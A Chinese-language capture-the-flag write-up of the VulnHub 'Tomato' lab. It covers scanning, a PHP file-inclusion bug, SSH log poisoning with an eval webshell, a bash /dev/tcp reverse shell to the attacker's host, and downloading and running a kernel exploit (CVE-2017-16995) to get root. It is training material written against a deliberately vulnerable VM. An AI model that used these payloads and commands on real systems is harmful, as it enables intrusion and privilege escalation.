Tomato

• 太久没有认真写（水）文章了，正好最近有实训课，同事发来几台靶机，写写记录。
• 靶机地址：https://www.vulnhub.com/entry/tomato-1,557/

信息收集

注：直接使用 VMware 导入 ova 即可。

• 首先查看 Kali IP 地址：

root at kali in ~ 
$ ip --color address
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host noprefixroute 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:36:e9:5d brd ff:ff:ff:ff:ff:ff
    inet 10.10.8.17/24 brd 10.10.8.255 scope global dynamic noprefixroute eth0
       valid_lft 1717sec preferred_lft 1717sec
    inet6 fe80::fff8:80c4:4cdf:a014/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever

地址探测

• 使用 Nmap 扫描出一个 IP：10.10.8.19

root at kali in ~/Tomato
$ nmap -sn --min-rate 10000 10.10.8.0/24 -oN nmap_ip.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-14 15:32 CST
Nmap scan report for 10.10.8.1
Host is up (0.000077s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.8.2
Host is up (0.000087s latency).
MAC Address: 00:50:56:EA:61:D3 (VMware)
Nmap scan report for 10.10.8.12
Host is up (0.000070s latency).
MAC Address: 00:0C:29:D8:0A:9D (VMware)
Nmap scan report for 10.10.8.19
Host is up (0.00015s latency).
MAC Address: 00:0C:29:B5:D5:EF (VMware)
Nmap scan report for 10.10.8.254
Host is up (0.000052s latency).
MAC Address: 00:50:56:E7:3A:52 (VMware)
Nmap scan report for 10.10.8.17
Host is up.
Nmap done: 256 IP addresses (6 hosts up) scanned in 12.37 seconds

端口扫描

• 扫描开放端口：

root at kali in ~/Tomato
$ nmap -p- -sC -T4 --min-rate 10000 10.10.8.19 -oN nmap_port.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-14 15:32 CST
Nmap scan report for 10.10.8.19
Host is up (0.000039s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
80/tcp   open  http
|_http-title: Tomato
2211/tcp open  emwin
8888/tcp open  sun-answerbook
MAC Address: 00:0C:29:B5:D5:EF (VMware)

Nmap done: 1 IP address (1 host up) scanned in 6.20 seconds

服务识别

• 扫描端口对应服务：

root at kali in ~/Tomato 
$ nmap -p21,80,2211,8888 -sV -O -A -sC -T4 --min-rate 10000 10.10.8.19 -oN nmap_server.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-14 15:36 CST
Nmap scan report for 10.10.8.19
Host is up (0.00076s latency).

PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Tomato
2211/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d2:53:0a:91:8c:f1:a6:10:11:0d:9e:0f:22:f8:49:8e (RSA)
|   256 b3:12:60:32:48:28:eb:ac:80:de:17:d7:96:77:6e:2f (ECDSA)
|_  256 36:6f:52:ad:fe:f7:92:3e:a2:51:0f:73:06:8d:80:13 (ED25519)
8888/tcp open  http    nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Private Property
|_http-title: 401 Authorization Required
MAC Address: 00:0C:29:B5:D5:EF (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.76 ms 10.10.8.19

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.39 seconds

漏洞扫描

• 使用 Nmap 进行漏洞扫描：

root at kali in ~/Tomato 
$ nmap --script=vuln -T4 --min-rate 10000 10.10.8.19 -oN nmap_vuln.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-14 15:37 CST
Nmap scan report for 10.10.8.19
Host is up (0.000083s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
80/tcp   open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
8888/tcp open  sun-answerbook
MAC Address: 00:0C:29:B5:D5:EF (VMware)

Nmap done: 1 IP address (1 host up) scanned in 323.50 seconds

• 看了下扫出来的漏洞，没一个有用的。

目录扫描

root at kali in ~/Tomato 
$ dirsearch -u http://10.10.8.19 -o $PWD/dirsearch.txt                

  _|. _ _  _  _  _ _|_    v0.4.2    
 (_||| _) (/_(_|| (_| )                                                                                                                                                                                                                   
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/Tomato/dirsearch.txt

Error Log: /root/.dirsearch/logs/errors-24-06-14_15-45-26.log

Target: http://10.10.8.19/

[15:45:26] Starting: 
[15:45:26] 403 -  275B  - /.ht_wsr.txt                                     
[15:45:26] 403 -  275B  - /.htaccess.bak1
[15:45:26] 403 -  275B  - /.htaccess.sample
......

root at kali in ~/Tomato 
$ cat dirsearch.txt | grep 200
200   652B   http://10.10.8.19:80/index.html

漏洞利用

• 依次访问扫描出的内容，很明显这是一个自建的站点：

• 80 端口就一张图片，访问 8888 端口：

• 8888 端口服务需要进行登录，也没什么信息。

目录扫描 v2

• 由于收集信息过少，尝试更换字典：

root at kali in ~/Tomato 
$ dirsearch -u http://10.10.8.19 -o $PWD/dirsearch.txt -w /usr/share/dirb/wordlists/common.txt

  _|. _ _  _  _  _ _|_    v0.4.2 
 (_||| _) (/_(_|| (_| )                                                                                                                    
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 4613

Output File: /root/Tomato/dirsearch.txt

Error Log: /root/.dirsearch/logs/errors-24-06-14_15-50-40.log

Target: http://10.10.8.19/

[15:50:40] Starting: 
[15:50:41] 301 -  316B  - /antibot_image  ->  http://10.10.8.19/antibot_image/
[15:50:43] 200 -  652B  - /index.html                                       
[15:50:46] 403 -  275B  - /server-status                                    
                                                                             
Task Completed

• 发现一个 antibot_image 目录，访问一下：

• 看到页面中有一个 info.php，尝试访问：

文件包含

• 就是一个单纯的 phpinfo 页面，不过这里作者很诡异的放了一个提示，右键查看页面源码：

• 可以看到这里存在有文件包含漏洞代码，尝试利用：

<?php include $_GET['image']?>

• 可以看到能够直接读取文件，尝试 PHP 伪协议的利用。
• 经过尝试无法进行代码利用，只能用于文件读取。

WebShell

• 既然只能读取文件，而对方又在 2211 端口开放有 SSH 服务，尝试包含 SSH 日志进行 GetShell。
• 判断目标的登录日志文件位置：

/var/log/auth.log

• 判断出对方的日志位于 /var/log/auth.log，尝试登录行为是否会被记录：

root at kali in ~/Tomato 
$ ssh 'Yongz'@10.10.8.19 -p 2211            
The authenticity of host '[10.10.8.19]:2211 ([10.10.8.19]:2211)' can't be established.
ED25519 key fingerprint is SHA256:99Mk+oWitdg2e434cvlhvYgeQaMwRs76tgSLrezh9/I.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.8.19]:2211' (ED25519) to the list of known hosts.
Yongz@10.10.8.19's password: 
Permission denied, please try again.
Yongz@10.10.8.19's password: 
Permission denied, please try again.
Yongz@10.10.8.19's password: 
Yongz@10.10.8.19: Permission denied (publickey,password).

• 使用 SSH 工具构造 WebShell：

root at kali in ~/Tomato 
$ ssh '<?php echo 404;eval($_REQUEST[1])?>'@10.10.8.19 -p 2211
<?php echo 404;eval($_REQUEST[1])?>@10.10.8.19's password: 
Permission denied, please try again.
<?php echo 404;eval($_REQUEST[1])?>@10.10.8.19's password: 
Permission denied, please try again.
<?php echo 404;eval($_REQUEST[1])?>@10.10.8.19's password: 
<?php echo 404;eval($_REQUEST[1])?>@10.10.8.19: Permission denied (publickey,password).

• 尝试使用 AntSword 连接：

• 成功连接~
• 由于 AntSword 的 Shell 功能缺失，使用 nc 反弹一个 Shell 到 Kali：

# Kali
nc -lvvp 4444
# 靶机
bash -c 'bash -i &> /dev/tcp/10.10.8.17/4444 0>&1'

• 成功反弹：

root at kali in ~/Tomato 
$ nc -lvvp 4444
listening on [any] 4444 ...
10.10.8.19: inverse host lookup failed: Host name lookup failure
connect to [10.10.8.17] from (UNKNOWN) [10.10.8.19] 44422
bash: cannot set terminal process group (904): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/var/www/html/antibot_image/antibots$ 

主机信息收集

• 查看当前系统中可使用的用户：

www-data@ubuntu:/var/www/html/antibot_image/antibots$ cat /etc/passwd | grep /bin/bash
<ml/antibot_image/antibots$ cat /etc/passwd | grep /bin/bash                 
root:x:0:0:root:/root:/bin/bash
tomato:x:1000:1000:Tomato,,,:/home/tomato:/bin/bash

• 查看 tomato 家目录：

www-data@ubuntu:/var/www/html/antibot_image/antibots$ ls -aRl /home/tomato
ls -aRl /home/tomato
/home/tomato:
total 40
drwxr-xr-x 5 tomato tomato 4096 Sep  7  2020 .
drwxr-xr-x 3 root   root   4096 Sep  7  2020 ..
-rw------- 1 tomato tomato   10 Sep  7  2020 .bash_history
-rw-r--r-- 1 tomato tomato  220 Sep  7  2020 .bash_logout
-rw-r--r-- 1 tomato tomato 3771 Sep  7  2020 .bashrc
drwx------ 2 tomato tomato 4096 Sep  7  2020 .cache
drwxrwxr-x 2 tomato tomato 4096 Sep  7  2020 .nano
-rw-r--r-- 1 tomato tomato  675 Sep  7  2020 .profile
drwx------ 2 tomato tomato 4096 Sep  7  2020 .ssh
-rw-r--r-- 1 tomato tomato    0 Sep  7  2020 .sudo_as_admin_successful
-rw-rw-r-- 1 tomato tomato  175 Sep  7  2020 .wget-hsts
ls: cannot open directory '/home/tomato/.cache': Permission denied

/home/tomato/.nano:
total 8
drwxrwxr-x 2 tomato tomato 4096 Sep  7  2020 .
drwxr-xr-x 5 tomato tomato 4096 Sep  7  2020 ..
ls: cannot open directory '/home/tomato/.ssh': Permission denied

• 查看是否有 SUID 文件：

www-data@ubuntu:/home/tomato$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/bin/ntfs-3g
/bin/su
/bin/ping6
/bin/fusermount
/bin/mount
/bin/ping
/bin/umount
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/vmware-user-suid-wrapper

• 目前来看，都没有什么可用信息与文件。

内核提权

• 既然还是啥也没有，那就再上大招，查看靶机中是否有 gcc 编译器：

www-data@ubuntu:/home/tomato$ gcc -v
gcc -v
The program 'gcc' is currently not installed. To run 'gcc' please ask your administrator to install the package 'gcc'

• 没装，那这就很尴尬了，只能使用别人编译好的了或者本地编译上传运行。
• 查看当前系统内核版本：

www-data@ubuntu:/home/tomato$ uname -a
uname -a
Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

www-data@ubuntu:/home/tomato$ cat /etc/*release
cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04 LTS"
NAME="Ubuntu"
VERSION="16.04 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
UBUNTU_CODENAME=xenial

• 在 Kali 中使用 searchsploit 工具查找对应内核/系统版本的漏洞：

• 这里选择 45010.c，移动到当前目录进行操作：

root at kali in ~/Tomato 
$ searchsploit -m 45010.c    
  Exploit: Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/45010
     Path: /usr/share/exploitdb/exploits/linux/local/45010.c
    Codes: CVE-2017-16995
 Verified: True
File Type: C source, ASCII text
Copied to: /root/Tomato/45010.c

• 使用 gcc 将 45010.c 编译成可执行文件：

root at kali in ~/Tomato 
$ gcc 45010.c -o exp

root at kali in ~/Tomato 
$ ls -l exp    
-rwxr-xr-x 1 root root 21616 Jun 14 17:12 exp

• 由于需要将 exp 文件上传至靶机进行编译，在 Kali 本地使用 Python 开启一个 Web 服务：

root at kali in ~/Tomato
$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

• 在靶机中使用 Wget 下载该文件：

www-data@ubuntu:/home/tomato$ cd /tmp                           
cd /tmp
www-data@ubuntu:/tmp$ wget http://10.10.8.17/exp
wget http://10.10.8.17/exp
--2024-06-14 02:13:23--  http://10.10.8.17/exp
Connecting to 10.10.8.17:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 21616 (21K) [application/octet-stream]
Saving to: 'exp'

     0K .......... .......... .                               100% 85.2M=0s

2024-06-14 02:13:23 (85.2 MB/s) - 'exp' saved [21616/21616]

www-data@ubuntu:/tmp$ ls -l exp
ls -l exp
-rw-r--r-- 1 www-data www-data 21616 Jun 14 02:12 exp

• 执行 exp 文件：

www-data@ubuntu:/tmp$ chmod +x exp
chmod +x exp
www-data@ubuntu:/tmp$ ./exp
./exp
./exp: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./exp)

• 发现此时执行不了，GLIBC 版本不对，这里就有个大坑QAQ，花了我半天时间。

注：这里网上的大部分文章其实都是直接在 Kali 上编译两个文件 45010.c 和 CVE-2017-6074，但如果使用的是近几年的 Kali，就会出现 GLIBC_2.34 的报错。

• 靶机上 ldd 版本是 2.23：ldd (Ubuntu GLIBC 2.23-0ubuntu3) 2.23
• Kali 2023.3上 ldd 版本是 2.37：ldd (Debian GLIBC 2.37-6) 2.37
• 这里若选择 ldd 降级非常麻烦，所以我这直接 Kali 2018.2（ldd (Debian GLIBC 2.27-3) 2.27） 进行编译。
• CVE-2017-6074 提权完，VMware 可能会报错。

• 步骤与上述一致，编译完成后上传到靶机即可：

www-data@ubuntu:/tmp$ wget http://10.10.8.17/45010         
wget http://10.10.8.17/45010
--2024-06-15 00:05:21--  http://10.10.8.17/45010
Connecting to 10.10.8.17:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18184 (18K) [application/octet-stream]
Saving to: '45010'

     0K .......... .......                                    100%  272M=0s

2024-06-15 00:05:21 (272 MB/s) - '45010' saved [18184/18184]
www-data@ubuntu:/tmp$ chmod 777 45010
chmod 777 45010
www-data@ubuntu:/tmp$ ./45010
./45010
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

• 成功获得 root 权限，查找 flag：

cd /root
ls
proof.txt
cat proof.txt
Sun_CSR_TEAM_TOMATO_JS_0232xx23